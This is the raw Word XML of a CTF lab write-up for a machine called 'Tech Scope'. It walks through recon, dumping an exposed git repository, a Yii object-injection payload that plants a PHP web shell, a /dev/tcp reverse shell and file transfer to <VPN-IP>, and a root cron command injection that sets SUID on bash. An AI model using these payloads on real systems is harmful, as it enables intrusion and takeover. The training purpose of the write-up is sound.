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852d36e270d2425782fd87b37472a93b.psmdcp" Id="Re602378f7bd94911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3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0" w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:start="0" w:end="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.wqimp56c687t" w:colFirst="0" w:colLast="0" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00000000" w:rsidDel="00000000" w:rsidR="00000000">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.qsw8uvkmwc2v" w:colFirst="0" w:colLast="0" w:id="1"/>
      <w:bookmarkEnd w:id="1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Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000000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write-up pertains to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7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machine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If you need support, please open a ticket on </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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the support channel on the Discord server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</w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.lg0s3a59tsxs" w:colFirst="0" w:colLast="0" w:id="2"/>
      <w:bookmarkEnd w:id="2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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000000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Let’s start by enumerating the target hosts,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Nmap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identify open ports and exposed services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000000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nmap -p- --open --min-rate 1200 &lt;MACHINE-IP&gt;-sVC -vvv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000000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784"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="2540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0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Two open ports were identified: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22 (SSH)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When sending a request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the web service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curl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 redirect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 was observed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the presence of a virtual host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(vhost)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configured in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000001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6128"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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ensure local resolution of the identified domain, a corresponding entry was added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/etc/hosts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associating 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target machine’s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IP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address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1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5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2445"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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7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web application was accessed via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initial interaction with the interface exposed by the service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000018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46563"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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and file enumeration was performed on the web application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ffuf,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employing brute-force techniques to identify hidden or undocumented resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000001B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ffuf -u http://techscope.hc/FUZZ -w big.txt -c -t 100 -fw 6148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000001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594100"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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enumeration of the web application, an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exposed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was identified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The presence of this directory indicates that the application’s version control repository is publicly accessible, which may allow for the extraction of source code, commit history, and potentially sensitive information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000002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the </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidRPr="00000000" w:rsidDel="00000000" w:rsidR="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs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hyperlink r:id="rId15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it was possible to download all files from the exposed repository, allowing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source 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 be reconstructed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from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git_dumper.py http://techscope.hc/.git dumper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000002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441700"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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797300"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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analysis of the obtained files,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SiteController.php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identified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controllers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which contains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function is related to the processing of payment-related requests within the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000002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187700"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="2540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D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uses user-controlled data to dynamically instantiate objects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Yii::createObject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handler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parameter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defines the class to be loaded, while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options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allows for the injection of arbitrary properties during object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000002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behavior allows an attacker to provide internal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 Framework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classes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manipulated parameters, directly influencing the application’s internal operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000002F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8wkee089c4e0" w:colFirst="0" w:colLast="0" w:id="3"/>
      <w:bookmarkEnd w:id="3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Exploitation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Pr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing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this vulnerability, it is possible to inject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malicious JSON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object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that, when processed by the application, results in files being written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vhost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/var/www/techscope/web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By controlling the content of this file, the attacker can insert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arbitrary PHP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code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commands to be executed on the system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PHP’s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constituting remote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execution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(RCE)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a direct impact on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000003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X-Service-Token: sh0p_webhook_secret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000003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Token: &lt;?php system($_GET[0]); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000003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3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"handler": "yii\\log\\Dispatcher",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000003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C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"options": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000003D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"targets": [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000003F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0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4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"class": "yii\\log\\FileTarget",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000004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"logFile": "/var/www/techscope/web/test1.php",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000004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"levels": ["info", "warning", "error", "trace"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000004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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000004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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000004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51200"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000004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 returned a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200 status code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JSON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response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that the request was processed successfully and that the file was created on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000004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http://techscope.hc/test1.php?0=ls%20-alh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000004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892300"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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1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This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established a reverse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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell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remote control of the compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000053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4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/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;VPN-IP&gt;/443 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000005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930400"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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7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8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reverse connection was successfully established and received on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443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allowing remote interaction with the compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000005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script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000005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ctr+z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000005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stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000005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184400"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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F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user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6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00400"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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3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qwfc0udguwtr" w:colFirst="0" w:colLast="0" w:id="4"/>
      <w:bookmarkEnd w:id="4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Privilege escalation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Pr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000065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analyze the processes running on the target machine, a binary called </w:t>
      </w:r>
      <w:hyperlink r:id="rId24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was transferred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used to monitor processes in real time without requiring elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000066">
      <w:pPr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7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python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="00000000" w:rsidDel="00000000" w:rsidR="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="2540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wget &lt;VPN-IP&gt;/pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000006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257300"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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62200"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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After running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pspy,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it was identified that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executed periodically by a cron job with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privileges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on the Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000007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079500"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="2540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5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allow for a more detailed analysis,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transferred from the target machine to the local environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000007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cat /usr/bin/healthcheck &gt; /dev/tcp/&lt;VPN-IP&gt;/443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000007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457200"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b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nc -lvnp 443 &gt; healthcheck</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000007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130300"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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F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binary was analyzed using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Ghidra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for inspection of its internal logic and behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000008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1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800"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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667000"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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3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Analysis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revealed two critical flaws: reading a configuration file at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/dev/shm/check.conf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global write permissions and insecure use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system()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unsanitized data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000085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for the injection of commands that will be executed as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enabling privilege escalation, such as adding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SUID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bash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6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Pr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000008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echo 'http://localhost; chmod +s /bin/bash #' &gt; /dev/shm/check.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="0000008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90600"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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52500"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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D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36800"/>
            <wp:effectExtent l="25400" t="25400" r="25400" b="254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90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId36"/>
      <w:headerReference w:type="first" r:id="rId37"/>
      <w:headerReference w:type="even" r:id="rId38"/>
      <w:footerReference w:type="default" r:id="rId39"/>
      <w:footerReference w:type="first" r:id="rId40"/>
      <w:footerReference w:type="even" r:id="rId41"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="0" w:right="1440" w:bottom="1440" w:lef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7">
    <w:p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40" w:lineRule="auto"/>
      <w:ind w:start="-1276" w:end="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:val="clear" w:fill="9a309b"/>
      </w:rPr>
    </w:pP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© 2026 Hacking Club | All rights reserved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                Page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begin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instrText xml:space="preserve">PAGE</w:instrTex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separate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8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9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1">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000092">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:name="_heading=h.6vrogorm36q9" w:colFirst="0" w:colLast="0" w:id="5"/>
    <w:bookmarkEnd w:id="5"/>
    <w:r w:rsidRPr="00000000" w:rsidDel="00000000" w:rsidR="00000000">
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="0" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1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l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="3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l="0" t="36271" r="-7644" b="28627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Pr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000093">
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines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before="360" w:after="120" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidRPr="00000000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w14:paraId="00000094">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidRPr="00000000" w:rsidDel="00000000" w:rsid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left="0f" croptop="0f" cropright="0f" cropbottom="0f" o:title="image21.png" r:id="rId2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5">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidRPr="00000000" w:rsidDel="00000000" w:rsidR="00000000">
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="0" behindDoc="1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1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l="0" t="0" r="0" b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l="0" t="0" r="0" b="8816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mc:AlternateContent>
        <mc:Choice Requires="wpg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00000" w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:spacing w:before="480" w:after="120" w:line="275.9999942779541"/>
                            <w:ind w:start="0" w:end="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pP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Write-up - </w:t>
                          </w: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Tech Scope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6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RPr="00000000" w:rsidDel="00000000" w:rsid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o:title="image21.png" r:id="rId1"/>
        </v:shape>
      </w:pic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41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml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10.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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4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12.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml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4AKCjzN1IviktQ3kdITzwHGVA==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDmguOHdrZWUwODljNGUwMg5oLnF3ZmMwdWRndXd0cjIOaC42dnJvZ29ybTM2cTk4AHIhMXEweEFRa1c3cVV1amJtOC0zVWhXLWZnY2JlbUhyQ1lB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